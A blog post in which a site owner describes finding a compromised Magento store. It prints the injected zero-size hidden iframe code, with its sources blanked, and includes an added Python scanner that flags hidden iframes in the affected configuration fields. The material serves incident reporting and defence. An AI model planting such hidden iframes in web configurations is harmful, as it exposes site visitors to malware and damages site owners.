Magento site was compromised

It was the first time I had seen a hacker get this close to me.

I have been flooded with notification emails from Google AdSense with the subject “Your AdSense Publisher Policy Violation Report” since yesterday afternoon. I immediately tried to visit either or to see what was going on. I got a scary warning message from Chrome and Firefox saying that either site contains malware (on desktop; Chrome for Android does not do a safe browsing check, and I don’t know if Firefox does).

It took me a while to find out which site contained malware. As was using AdSense but wasn’t, at first I thought it was that was hacked. was powered by WordPress, so I went through all the plugins and compared them with my other WordPress sites, but I didn’t find a suspicious plugin.

Then I started to look into the main domain site, which runs Magento. It took me quite a while to learn there was a good tool from to check what malware was on the site.

Then it took me another while to find out how the hacker did it. Basically the hacker compromised the password of one of the admins (not mine) and added the following code in three places (design/footer/copyright, design/head/includes, design/footer/absolute_footer) in Magento System >> Configuration.

<iframe src="" frameborder="0" width="0" height="0"></iframe><iframe src="" frameborder="0" width="0" height="0"></iframe>

 and are malware sites. And if a site links to them, it is regarded as a malware site as well.
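A defensive check for the kind of injection described above, as an added example that is not part of the original post: it scans the three configuration fields for invisible iframes. It assumes the values live in Magento's core_config_data table; an in-memory SQLite table stands in for the store's database, and the sample rows and .invalid hosts are constructed.

```python
import sqlite3
from html.parser import HTMLParser
# The three System >> Configuration fields named in the post.
WATCHED_PATHS = ("design/footer/copyright", "design/head/includes", "design/footer/absolute_footer")

class HiddenFrameFinder(HTMLParser):
    """Collects the src of every <iframe> that is zero-sized or hidden by style."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        zero = a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
        style = a.get("style", "").replace(" ", "").lower()
        if zero or "display:none" in style or "visibility:hidden" in style:
            self.hits.append(a.get("src", ""))

def find_hidden_iframes(value):
    finder = HiddenFrameFinder()
    finder.feed(value or "")
    return finder.hits

def scan_config(conn):
    """Return (scope, scope_id, path, src) per hidden iframe in the watched fields."""
    marks = ",".join("?" * len(WATCHED_PATHS))
    rows = conn.execute(
        "SELECT scope, scope_id, path, value FROM core_config_data "
        f"WHERE path IN ({marks}) ORDER BY path, scope_id", WATCHED_PATHS)
    return [(s, i, p, src) for s, i, p, v in rows for src in find_hidden_iframes(v)]

def demo_db():
    """Constructed sample rows; the .invalid hosts are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE core_config_data (scope, scope_id, path, value)")
    conn.executemany("INSERT INTO core_config_data VALUES (?, ?, ?, ?)", [
        ("default", 0, "design/footer/copyright", '&copy; Store <iframe '
         'src="http://placeholder.invalid/a" frameborder="0" width="0" height="0"></iframe>'),
        ("default", 0, "design/head/includes", '<link rel="stylesheet" href="/x.css"/>'),
        ("stores", 1, "design/footer/absolute_footer",
         '<iframe src="//placeholder.invalid/b" style="display: none"></iframe>'),
        ("default", 0, "design/footer/absolute_footer", '<iframe src="/map" width="560"></iframe>'),
    ])
    return conn

if __name__ == "__main__":
    print(scan_config(demo_db()))
```

Run against the real table, every row it returns is worth checking, including store-level and website-level scopes, since an injected value can sit in any of them.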

When I disabled access for the compromised admin accounts (without removing the injected code), I found Chrome and Firefox stopped giving those scary warnings, and visits to or are redirected to Google. I don’t understand how Google can take control of these domains so quickly, but anyway, it is not my business.

At last I removed all the malware code and requested an AdSense review of
